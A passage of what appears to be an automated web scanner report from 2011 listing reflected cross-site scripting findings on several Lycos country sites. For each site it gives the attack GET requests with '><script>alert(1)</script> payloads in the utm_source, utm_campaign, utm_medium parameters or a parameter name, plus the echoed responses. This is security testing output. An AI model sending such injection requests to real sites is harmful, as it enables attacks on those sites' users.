HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?6ff53"><script>alert(1)</script>cd12f610c1e=1&diktfc=60A4E7DE95783082C6A67156E5569EE03940952047BA&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46ce5"><script>alert(1)</script>dd4cf543bb0 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags46ce5"><script>alert(1)</script>dd4cf543bb0&utm_medium=footer HTTP/1.1 Host: www.lycos.cl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161724686; path=/ Date: Mon, 07 Feb 2011 14:52:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags46ce5"><script>alert(1)</script>dd4cf543bb0&utm_medium=footer&diktfc=3DA23C56D3205E5CC7707F1094FCEC4D179B99676E2D&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7598"><script>alert(1)</script>066ac18df11 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerc7598"><script>alert(1)</script>066ac18df11 HTTP/1.1 Host: www.lycos.cl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:38 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerc7598"><script>alert(1)</script>066ac18df11&diktfc=0BBD05613D8725D9A0A9EDDE43B0D71D405F1D3EF2D7&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9617c"><script>alert(1)</script>301fdbb6394 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome9617c"><script>alert(1)</script>301fdbb6394&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.cl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839801644; path=/ Date: Mon, 07 Feb 2011 14:52:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome9617c"><script>alert(1)</script>301fdbb6394&utm_campaign=home_flags&utm_medium=footer&diktfc=F9E5AA1DBAD3485556957A0A82B6CC0799413F73B18A&mobile=1"> ...[SNIP]...
1.319. http://www.lycos.co.jp/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.co.jp
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53488"><script>alert(1)</script>1ab06371fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?53488"><script>alert(1)</script>1ab06371fc4=1 HTTP/1.1 Host: www.lycos.co.jp Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ja"> <head> <title>Lycos</ ...[SNIP]... <a href="/?53488"><script>alert(1)</script>1ab06371fc4=1&diktfc=06547C4A8B8F2143E8C5ABDBFF110081B87360796E71&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b91"><script>alert(1)</script>2d31da47cee was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagse8b91"><script>alert(1)</script>2d31da47cee&utm_medium=footer HTTP/1.1 Host: www.lycos.co.jp Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161729042; path=/ Date: Mon, 07 Feb 2011 14:52:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ja"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flagse8b91"><script>alert(1)</script>2d31da47cee&utm_medium=footer&diktfc=CF8E2EC8CEE43DFF8CBA05F2414C84C0ECC98DDC2A03&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448f"><script>alert(1)</script>bb2ebbb57ec was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5448f"><script>alert(1)</script>bb2ebbb57ec HTTP/1.1 Host: www.lycos.co.jp Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839802733; path=/ Date: Mon, 07 Feb 2011 14:52:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ja"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer5448f"><script>alert(1)</script>bb2ebbb57ec&diktfc=2E56B0D12FA701733BF6ACB5F9D3D7F2CC79926C7000&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1186"><script>alert(1)</script>7b2378e72c was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshomea1186"><script>alert(1)</script>7b2378e72c&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.co.jp Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ja"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshomea1186"><script>alert(1)</script>7b2378e72c&utm_campaign=home_flags&utm_medium=footer&diktfc=385D62F984C633031F8675F2A5F2C310214C53653904&mobile=1"> ...[SNIP]...
1.323. http://www.lycos.co.kr/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.co.kr
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2701f"><script>alert(1)</script>177cda4892a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?2701f"><script>alert(1)</script>177cda4892a=1 HTTP/1.1 Host: www.lycos.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161731220; path=/ Date: Mon, 07 Feb 2011 14:52:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:40 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ko"> <head> <title>Lycos</ ...[SNIP]... <a href="/?2701f"><script>alert(1)</script>177cda4892a=1&diktfc=13818BCF06993A9EFA7CAC491953B3EB2027C007761A&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48337"><script>alert(1)</script>d23a44336b5 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags48337"><script>alert(1)</script>d23a44336b5&utm_medium=footer HTTP/1.1 Host: www.lycos.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839836492; path=/ Date: Mon, 07 Feb 2011 14:52:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ko"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags48337"><script>alert(1)</script>d23a44336b5&utm_medium=footer&diktfc=9E3AF7535B7ED6EA92451082AC7F3403079042F6BCFA&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb223"><script>alert(1)</script>e1734919da3 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerfb223"><script>alert(1)</script>e1734919da3 HTTP/1.1 Host: www.lycos.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:52:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ko"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footerfb223"><script>alert(1)</script>e1734919da3&diktfc=F8BF5B16745C815EABA1C37472011D045F7EFEFA0941&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54494"><script>alert(1)</script>f3c3de385aa was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome54494"><script>alert(1)</script>f3c3de385aa&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.co.kr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839841937; path=/ Date: Mon, 07 Feb 2011 14:52:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ko"> <head> <title>Lycos</ ...[SNIP]... <a href="/?utm_source=lycoshome54494"><script>alert(1)</script>f3c3de385aa&utm_campaign=home_flags&utm_medium=footer&diktfc=F3A30C64A05D2CD65F1D9D6A181AB9EE7E8DD8D23278&mobile=1"> ...[SNIP]...
1.327. http://www.lycos.co.nz/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.co.nz
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72762"><script>alert(1)</script>139d8c10ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?72762"><script>alert(1)</script>139d8c10ea4=1 HTTP/1.1 Host: www.lycos.co.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839801644; path=/ Date: Mon, 07 Feb 2011 14:52:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?72762"><script>alert(1)</script>139d8c10ea4=1&diktfc=E168C627BC5EE3183B31B7D6392935D136109A410938&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a04e"><script>alert(1)</script>a8551c9c3a8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags7a04e"><script>alert(1)</script>a8551c9c3a8&utm_medium=footer HTTP/1.1 Host: www.lycos.co.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags7a04e"><script>alert(1)</script>a8551c9c3a8&utm_medium=footer&diktfc=6BD8920DBAF296C390FFD2FDA01292618801F6BA5D23&mobile=1"> ...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75433"><script>alert(1)</script>b97642fe639 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer75433"><script>alert(1)</script>b97642fe639 HTTP/1.1 Host: www.lycos.co.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839840848; path=/ Date: Mon, 07 Feb 2011 14:52:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:44 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer75433"><script>alert(1)</script>b97642fe639&diktfc=37023808F0E3A1E13A4C45B4126D8E06196372CA60DC&mobile=1"> ...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f9c"><script>alert(1)</script>958f282d7ea was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome86f9c"><script>alert(1)</script>958f282d7ea&utm_campaign=home_flags&utm_medium=footer HTTP/1.1 Host: www.lycos.co.nz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R3839803822; path=/ Date: Mon, 07 Feb 2011 14:52:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?utm_source=lycoshome86f9c"><script>alert(1)</script>958f282d7ea&utm_campaign=home_flags&utm_medium=footer&diktfc=6CBCB8125FE9AA536D6451168688D4E7ED64B9E7E098&mobile=1"> ...[SNIP]...
1.331. http://www.lycos.co.uk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lycos.co.uk
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>5bd76483a7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?7ae3b"><script>alert(1)</script>5bd76483a7b=1 HTTP/1.1 Host: www.lycos.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161732309; path=/ Date: Mon, 07 Feb 2011 14:52:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos</title><met ...[SNIP]... <a href="/?7ae3b"><script>alert(1)</script>5bd76483a7b=1&diktfc=E00C4896CD127C2EBE41CD935A4C854A35AF8218644C&mobile=1"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09db"><script>alert(1)</script>e65cd00e666 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?utm_source=lycoshome&utm_campaign=home_flagsd09db"><script>alert(1)</script>e65cd00e666&utm_medium=footer HTTP/1.1 Host: www.lycos.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Set-Cookie: CORE-STICKY=R1161726864; path=/ Date: Mon, 07 Feb 2011 14:52:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:45 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16379
